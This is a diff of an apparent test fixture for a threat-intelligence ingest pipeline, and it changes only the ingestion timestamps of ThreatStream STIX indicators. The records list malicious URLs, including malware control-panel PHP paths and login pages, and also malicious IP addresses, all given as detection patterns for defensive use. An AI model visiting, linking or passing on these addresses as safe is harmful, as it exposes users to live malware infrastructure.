@@ -11185,7 +11185,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023855900Z", + "ingested": "2021-12-14T14:57:43.118256653Z", "original": "{\"created\":\"2020-01-29T03:02:14.284Z\",\"description\":\"TS ID: 55266539013; iType: mal_url; State: active; Org: Lir.bg EOOD; Source: CyberCrime\",\"id\":\"indicator--96051c6b-3648-43ba-b579-735bd6342ec2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-29T03:02:14.284Z\",\"name\":\"mal_url: http://sbsinstitute.co.in/wp-includes/temp/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sbsinstitute.co.in/wp-includes/temp/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:14.284Z\"}", "category": "threat", "type": "indicator", @@ -11237,7 +11237,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023859700Z", + "ingested": "2021-12-14T14:57:43.118257096Z", "original": "{\"created\":\"2020-01-29T03:02:24.081Z\",\"description\":\"TS ID: 55266539001; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--d76d300b-07b7-4e9b-b7f1-9e6c0def6a6b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:02:24.081Z\",\"name\":\"mal_url: http://ecoorganic.co/Work7/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work7/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:24.081Z\"}", "category": "threat", "type": "indicator", 
@@ -11289,7 +11289,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023863700Z", + "ingested": "2021-12-14T14:57:43.118257555Z", "original": "{\"created\":\"2020-01-29T03:02:31.573Z\",\"description\":\"TS ID: 55266539009; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--3c61c714-aab6-46e2-abfd-389628870d7d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-29T03:02:31.573Z\",\"name\":\"mal_url: http://v200598.hosted-by-vdsina.ru/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://v200598.hosted-by-vdsina.ru/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:31.573Z\"}", "category": "threat", "type": "indicator", @@ -11341,7 +11341,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023869Z", + "ingested": "2021-12-14T14:57:43.118258021Z", "original": "{\"created\":\"2020-01-29T03:02:31.605Z\",\"description\":\"TS ID: 55266539007; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--3c9a39df-b4f3-4529-bfd8-d8b40801e555\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:02:31.605Z\",\"name\":\"mal_url: http://ecoorganic.co/Work1/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work1/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:31.605Z\"}", "category": "threat", "type": "indicator", 
@@ -11386,7 +11386,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023873500Z", + "ingested": "2021-12-14T14:57:43.118258451Z", "original": "{\"created\":\"2020-01-29T03:02:41.021Z\",\"description\":\"TS ID: 55266538989; iType: mal_ip; State: active; Org: Telenet Ltd.; Source: CyberCrime\",\"id\":\"indicator--756932e1-687c-41c9-9b55-2a762c8a1ef3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-29T03:02:41.021Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:41.021Z\"}", "category": "threat", "type": "indicator", @@ -11438,7 +11438,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023878Z", + "ingested": "2021-12-14T14:57:43.118258835Z", "original": "{\"created\":\"2020-01-29T03:02:42.284Z\",\"description\":\"TS ID: 55266539010; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--e34dc439-4789-4d5a-b7dc-471fb473f4a0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-29T03:02:42.284Z\",\"name\":\"mal_url: http://v178903.hosted-by-vdsina.ru/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://v178903.hosted-by-vdsina.ru/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:42.284Z\"}", "category": "threat", "type": "indicator", 
@@ -11490,7 +11490,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023881600Z", + "ingested": "2021-12-14T14:57:43.118259270Z", "original": "{\"created\":\"2020-01-29T03:02:42.335Z\",\"description\":\"TS ID: 55266538994; iType: mal_url; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--a30fe926-53b8-43fe-a792-8ecd41071dd7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-29T03:02:42.335Z\",\"name\":\"mal_url: http://tickerqube.com/Loki2020/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tickerqube.com/Loki2020/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:42.335Z\"}", "category": "threat", "type": "indicator", @@ -11542,7 +11542,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023886900Z", + "ingested": "2021-12-14T14:57:43.118259776Z", "original": "{\"created\":\"2020-01-29T03:02:42.367Z\",\"description\":\"TS ID: 55266538986; iType: mal_url; State: active; Org: Eonix Corporation; Source: CyberCrime\",\"id\":\"indicator--0005f77c-327b-4b69-8046-777efe95361d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-29T03:02:42.367Z\",\"name\":\"mal_url: http://microsoftrenat.site/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://microsoftrenat.site/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:42.367Z\"}", "category": "threat", "type": "indicator", 
@@ -11594,7 +11594,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023894300Z", + "ingested": "2021-12-14T14:57:43.118260169Z", "original": "{\"created\":\"2020-01-29T03:02:48.869Z\",\"description\":\"TS ID: 55266539005; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--2ef4b932-5434-49f4-8255-a70de96893d8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:02:48.869Z\",\"name\":\"mal_url: http://ecoorganic.co/Work3/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work3/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:48.869Z\"}", "category": "threat", "type": "indicator", @@ -11639,7 +11639,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023901700Z", + "ingested": "2021-12-14T14:57:43.118260557Z", "original": "{\"created\":\"2020-01-29T03:02:48.897Z\",\"description\":\"TS ID: 55266538991; iType: mal_ip; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime\",\"id\":\"indicator--becea156-fb29-4cd3-80b1-55cb739e0b6c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-01-29T03:02:48.897Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:48.897Z\"}", "category": "threat", "type": "indicator", 
@@ -11690,7 +11690,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023906400Z", + "ingested": "2021-12-14T14:57:43.118261094Z", "original": "{\"created\":\"2020-01-30T02:58:32.284Z\",\"description\":\"TS ID: 55270319168; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--8da10219-9eb1-4963-8889-587598e511cd\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-01-30T02:58:32.284Z\",\"name\":\"mal_url: http://www.cpadeer.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://www.cpadeer.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-30T02:58:32.284Z\"}", "category": "threat", "type": "indicator", @@ -11742,7 +11742,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023910600Z", + "ingested": "2021-12-14T14:57:43.118261549Z", "original": "{\"created\":\"2020-01-31T02:19:29.045Z\",\"description\":\"TS ID: 55274447486; iType: mal_url; State: active; Org: SingleHop LLC; Source: CyberCrime\",\"id\":\"indicator--093bf827-0d84-4b54-9d62-dffffd0a619b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-31T02:19:29.045Z\",\"name\":\"mal_url: http://cleaning-hygiene.com/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://cleaning-hygiene.com/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-31T02:19:29.045Z\"}", "category": "threat", "type": "indicator", 
@@ -11794,7 +11794,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023915800Z", + "ingested": "2021-12-14T14:57:43.118261989Z", "original": "{\"created\":\"2020-01-31T02:22:09.726Z\",\"description\":\"TS ID: 55274447484; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--51d4eb13-adf7-4de1-a3f0-106d343ad560\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-31T02:22:09.726Z\",\"name\":\"mal_url: http://corpcougar.com/buggy/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/buggy/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-31T02:22:09.726Z\"}", "category": "threat", "type": "indicator", @@ -11846,7 +11846,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023919900Z", + "ingested": "2021-12-14T14:57:43.118262424Z", "original": "{\"created\":\"2020-02-01T02:03:02.79Z\",\"description\":\"TS ID: 55277443309; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--a5926161-953c-4763-9d10-0c5e10bcd4e4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:03:02.79Z\",\"name\":\"mal_url: http://marubemi.com/owen/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://marubemi.com/owen/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:02.79Z\"}", "category": "threat", "type": "indicator", 
@@ -11891,7 +11891,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023926200Z", + "ingested": "2021-12-14T14:57:43.118263011Z", "original": "{\"created\":\"2020-02-01T02:03:07.047Z\",\"description\":\"TS ID: 55277443409; iType: mal_ip; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--ee4a872e-e53e-428f-86a1-32c4e4db68f6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-28\"],\"modified\":\"2020-02-01T02:03:07.047Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:07.047Z\"}", "category": "threat", "type": "indicator", @@ -11943,7 +11943,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023930100Z", + "ingested": "2021-12-14T14:57:43.118263450Z", "original": "{\"created\":\"2020-02-01T02:03:48.038Z\",\"description\":\"TS ID: 55277443373; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--8494f340-0964-47f0-ba09-78fe0b76eb34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:03:48.038Z\",\"name\":\"mal_url: http://zeyadigital.com/etty/black/download/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://zeyadigital.com/etty/black/download/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:48.038Z\"}", "category": "threat", "type": "indicator", 
@@ -11995,7 +11995,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023935500Z", + "ingested": "2021-12-14T14:57:43.118263832Z", "original": "{\"created\":\"2020-02-01T02:03:48.079Z\",\"description\":\"TS ID: 55277443242; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--f051e10a-76c9-4f14-9fa3-9dbccc65c26f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:03:48.079Z\",\"name\":\"mal_url: http://farzanatradings.com/maindon/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farzanatradings.com/maindon/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:48.079Z\"}", "category": "threat", "type": "indicator", @@ -12047,7 +12047,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023939400Z", + "ingested": "2021-12-14T14:57:43.118264230Z", "original": "{\"created\":\"2020-02-01T02:04:16.392Z\",\"description\":\"TS ID: 55277443446; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--79c8f52b-f134-4e02-ad7a-6169063c8fba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:04:16.392Z\",\"name\":\"mal_url: http://trouserlanditd.com/draw/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trouserlanditd.com/draw/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:16.392Z\"}", "category": "threat", "type": "indicator", 
@@ -12099,7 +12099,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023943600Z", + "ingested": "2021-12-14T14:57:43.118264610Z", "original": "{\"created\":\"2020-02-01T02:04:21.636Z\",\"description\":\"TS ID: 55277443452; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--7338fc3d-2a1f-4583-b34d-eb76912a43e6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-01T02:04:21.636Z\",\"name\":\"mal_url: http://krompres.tk/loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://krompres.tk/loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.636Z\"}", "category": "threat", "type": "indicator", @@ -12150,7 +12150,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023948Z", + "ingested": "2021-12-14T14:57:43.118265068Z", "original": "{\"created\":\"2020-02-01T02:04:21.676Z\",\"description\":\"TS ID: 55277443202; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--1f9e0571-119c-448a-8656-fec49c9c058a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-01T02:04:21.676Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.676Z\"}", "category": "threat", "type": "indicator", 
@@ -12201,7 +12201,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023951500Z", + "ingested": "2021-12-14T14:57:43.118265456Z", "original": "{\"created\":\"2020-02-01T02:04:21.705Z\",\"description\":\"TS ID: 55277443078; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--d1161e31-f661-469c-b206-84e1d416e577\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-02-01T02:04:21.705Z\",\"name\":\"mal_url: http://gosdick.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gosdick.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.705Z\"}", "category": "threat", "type": "indicator", @@ -12246,7 +12246,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023956800Z", + "ingested": "2021-12-14T14:57:43.118265941Z", "original": "{\"created\":\"2020-02-01T02:04:21.745Z\",\"description\":\"TS ID: 55277442685; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime\",\"id\":\"indicator--8f0a9931-5ee4-4b0e-b473-b130d72ef175\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-17\"],\"modified\":\"2020-02-01T02:04:21.745Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.745Z\"}", "category": "threat", "type": "indicator", 
@@ -12298,7 +12298,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023963Z", + "ingested": "2021-12-14T14:57:43.118266377Z", "original": "{\"created\":\"2020-02-01T02:05:07.232Z\",\"description\":\"TS ID: 55277443523; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--0068cb9c-0bdf-44a8-9563-5006e0c38921\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-02-01T02:05:07.232Z\",\"name\":\"mal_url: http://everest--sh.com/click/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://everest--sh.com/click/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:05:07.232Z\"}", "category": "threat", "type": "indicator", @@ -12350,7 +12350,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023969300Z", + "ingested": "2021-12-14T14:57:43.118266835Z", "original": "{\"created\":\"2020-02-01T02:05:07.274Z\",\"description\":\"TS ID: 55277442283; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--2dd49cbe-4835-49ea-a29c-b173c0840506\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-01T02:05:07.274Z\",\"name\":\"mal_url: http://89.160.20.156/tspir/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/tspir/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:05:07.274Z\"}", "category": "threat", "type": "indicator", 
@@ -12402,7 +12402,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023975100Z", + "ingested": "2021-12-14T14:57:43.118267248Z", "original": "{\"created\":\"2020-02-01T02:06:07.042Z\",\"description\":\"TS ID: 55277443220; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--b8e709b0-7eb8-4b2b-94f0-e21c4138cf9b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:06:07.042Z\",\"name\":\"mal_url: http://vware.duckdns.org/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://vware.duckdns.org/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:07.042Z\"}", "category": "threat", "type": "indicator", @@ -12454,7 +12454,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023981700Z", + "ingested": "2021-12-14T14:57:43.118267765Z", "original": "{\"created\":\"2020-02-01T02:06:15.505Z\",\"description\":\"TS ID: 55277443605; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--10e62d11-dbc5-4d39-badf-574aaab2d0f5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-01T02:06:15.505Z\",\"name\":\"mal_url: http://cokhiquangbien.com/.jx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://cokhiquangbien.com/.jx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:15.505Z\"}", "category": "threat", "type": "indicator", 
@@ -12506,7 +12506,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023989100Z", + "ingested": "2021-12-14T14:57:43.118268211Z", "original": "{\"created\":\"2020-02-01T02:06:15.674Z\",\"description\":\"TS ID: 55277443276; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--a84ddb39-c02c-44cc-bac3-0056c279454c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:06:15.674Z\",\"name\":\"mal_url: http://corpcougar.com/nedu/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/nedu/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:15.674Z\"}", "category": "threat", "type": "indicator", @@ -12557,7 +12557,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023996300Z", + "ingested": "2021-12-14T14:57:43.118268641Z", "original": "{\"created\":\"2020-02-01T02:06:38.684Z\",\"description\":\"TS ID: 55277443190; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--f667d2dd-f6df-4aa4-bd7b-8b7f3e98fa0a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-01T02:06:38.684Z\",\"name\":\"mal_url: http://bubble2.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bubble2.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:38.684Z\"}", "category": "threat", "type": "indicator", 
@@ -12609,7 +12609,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024003700Z", + "ingested": "2021-12-14T14:57:43.118269027Z", "original": "{\"created\":\"2020-02-01T02:06:38.733Z\",\"description\":\"TS ID: 55277442690; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--a81a2408-b11b-4b28-a5b6-ffec11942d62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-32\"],\"modified\":\"2020-02-01T02:06:38.733Z\",\"name\":\"mal_url: http://144.202.96.212/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://144.202.96.212/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:38.733Z\"}", "category": "threat", "type": "indicator", @@ -12661,7 +12661,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024011Z", + "ingested": "2021-12-14T14:57:43.118269412Z", "original": "{\"created\":\"2020-02-01T02:06:49.292Z\",\"description\":\"TS ID: 55277443216; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--4a414cbe-3e02-48b9-84fb-103ed9961e6c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-01T02:06:49.292Z\",\"name\":\"mal_url: http://papafrog.beget.tech/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://papafrog.beget.tech/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:49.292Z\"}", "category": "threat", "type": "indicator", 
@@ -12712,7 +12712,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024018300Z", + "ingested": "2021-12-14T14:57:43.118269906Z", "original": "{\"created\":\"2020-02-01T02:07:27.633Z\",\"description\":\"TS ID: 55277443028; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--27f66dbf-4ce9-4616-aef1-c6ab9f224ecb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:07:27.633Z\",\"name\":\"mal_url: http://t917659s.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://t917659s.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:07:27.633Z\"}", "category": "threat", "type": "indicator", @@ -12763,7 +12763,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024025500Z", + "ingested": "2021-12-14T14:57:43.118270289Z", "original": "{\"created\":\"2020-02-01T02:07:36.513Z\",\"description\":\"TS ID: 55277443145; iType: mal_url; State: active; Org: Host Europe GmbH; Source: CyberCrime\",\"id\":\"indicator--4cd504ee-3b5e-439f-b37d-3e932b200a55\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-01T02:07:36.513Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:07:36.513Z\"}", "category": "threat", "type": "indicator", 
